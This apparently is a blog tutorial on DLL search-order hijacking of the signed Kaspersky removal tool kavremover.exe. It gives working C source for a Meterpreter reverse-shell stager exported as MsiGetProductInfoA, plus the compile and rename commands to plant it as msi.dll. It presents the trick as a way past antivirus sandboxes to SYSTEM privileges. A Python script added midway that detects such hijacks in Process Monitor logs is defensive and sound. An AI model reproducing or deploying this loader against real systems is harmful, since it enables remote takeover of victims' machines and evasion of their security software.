Today I will show you an interesting example of how to search for DLL functions vulnerable to search-order hijacking, compile them into our custom Meterpreter DLL loader, and let a signed executable execute it.
I have taken the good old Kaspersky Removal Tool, kavremover. This tool is perfect for this example. As the host system I have Windows 7 SP1 64-bit. What we need is the Sysinternals Suite, most importantly Process Monitor (procmon.exe). We start procmon.exe and create a filter rule on the process name kavremover.exe so that only this process is shown for analysis. Next we launch kavremover.exe and look for vulnerable DLL paths. After a while I came across the following DLL, which is searched for first in the directory kavremover.exe is executed from (in our case the user's desktop):
We then look at which functions kavremover.exe imports from msi.dll, and I found an interesting list here:
There are two functions imported from msi.dll, GetInfo and MsiGetProductInfoA. So let's modify our Meterpreter DLL a little and rename the main() function to either GetInfo or MsiGetProductInfoA.
The generator from my previous post produces a binary and a C source file called temp.c. After setting the Metasploit server IP and port number, open temp.c and change the function main() to something like this:
    int MsiGetProductInfoA(int argc, char * argv[])
    {
        FreeConsole();
        ULONG32 size;
        char * buffer;
        void (*function)();

        /* connect back to the handler set via server / serverp in temp.c */
        winsock_init();
        SOCKET my_socket = wsconnect(server, atoi(serverp));

        /* the handler first sends the length of the stage */
        int count = recv(my_socket, (char *)&size, 4, 0);
        if (count != 4 || size <= 0)
            punt(my_socket, "error length\n");

        /* executable buffer: 5 bytes of prologue plus the stage itself */
        buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (buffer == NULL)
            punt(my_socket, "error in buf\n");
        buffer[0] = 0xBF;
        memcpy(buffer + 1, &my_socket, 4);
        count = recv_all(my_socket, buffer + 5, size);

        function = (void (*)())buffer;
        function();
        return 0;
    }
Please note that if you use int GetInfo(), kavremover.exe will crash and we won't get a reverse shell, so use MsiGetProductInfoA. This works just fine; the program itself won't load properly, of course, but it gets the job done. Once modified, compile temp.c:
    i586-mingw32msvc-gcc temp.c -o payload.dll -lws2_32 -shared
    strip payload.dll
    mv payload.dll msi.dll
Next we upload the final msi.dll to the virtual test system where kavremover.exe is waiting. Start your favourite reverse shell handler in Metasploit and wait for the shell to pop once we execute kavremover.exe.
kavremover.exe is digitally signed, so in many cases our DLL gets loaded just fine, bypassing many sandbox techniques (Comodo AV, for example) and allowing us to elevate to NT AUTHORITY\SYSTEM.
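The defender's counterpart to the procmon work above, as an added example that is not from the original post: a small Python script that reads a Process Monitor CSV export and flags a watchlisted system DLL (here msi.dll) that was mapped into a process from outside the Windows system directories, which is exactly the footprint a planted copy next to a signed executable leaves. The column names follow Procmon's CSV export and the events are constructed sample data.

```python
import csv
import io
import ntpath

# Example watchlist: system DLLs a legitimate process should only ever load
# from the Windows system directories. msi.dll is the one hijacked in the post.
WATCHLIST = {"msi.dll"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Constructed Procmon CSV export (File > Save, CSV). Column names follow the
# default export; the events themselves are made up for this example.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0000000","kavremover.exe","1234","Load Image","C:\Users\lab\Desktop\kavremover.exe","SUCCESS","Image Base: 0x400000"
"10:00:01.0100000","kavremover.exe","1234","Load Image","C:\Windows\System32\ntdll.dll","SUCCESS","Image Base: 0x77a00000"
"10:00:01.0200000","kavremover.exe","1234","Load Image","C:\Users\lab\Desktop\msi.dll","SUCCESS","Image Base: 0x10000000"
"10:00:02.0000000","msiexec.exe","2222","Load Image","C:\Windows\System32\msiexec.exe","SUCCESS","Image Base: 0x400000"
"10:00:02.0100000","msiexec.exe","2222","Load Image","C:\Windows\System32\msi.dll","SUCCESS","Image Base: 0x74000000"
'''


def find_hijacked_loads(csv_text, watchlist=WATCHLIST):
    """Return (process, dll_path, loaded_from_app_dir) for every watchlisted
    DLL that was successfully mapped from outside the system directories."""
    exe_dirs = {}  # PID -> directory of the process image (first .exe mapped)
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "Load Image" or row["Result"] != "SUCCESS":
            continue
        directory, name = ntpath.split(row["Path"])
        directory, name = directory.lower(), name.lower()
        if name.endswith(".exe"):
            exe_dirs.setdefault(row["PID"], directory)
            continue
        if name in watchlist and not directory.startswith(SYSTEM_DIRS):
            # The loader tries the application directory before System32, so
            # a copy sitting next to the executable is the classic hijack.
            from_app_dir = exe_dirs.get(row["PID"]) == directory
            hits.append((row["Process Name"], row["Path"], from_app_dir))
    return hits


if __name__ == "__main__":
    for proc, path, app_dir in find_hijacked_loads(SAMPLE_CSV):
        where = "application directory" if app_dir else "non-system directory"
        print(f"{proc}: loaded {path} from the {where}")
```

The same check works on a live export from the test system described in this post; the legitimate msiexec.exe load of msi.dll from System32 produces no hit.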
Here is a short video of the whole process
Also here is a short video demonstrating the attack against a fully updated Windows 8.1 64-bit with active Windows Defender (kinda lame, but nevertheless)...
And now to think what could possibly go wrong... (Win 8.1 64-bit + Comodo AV Advanced 6)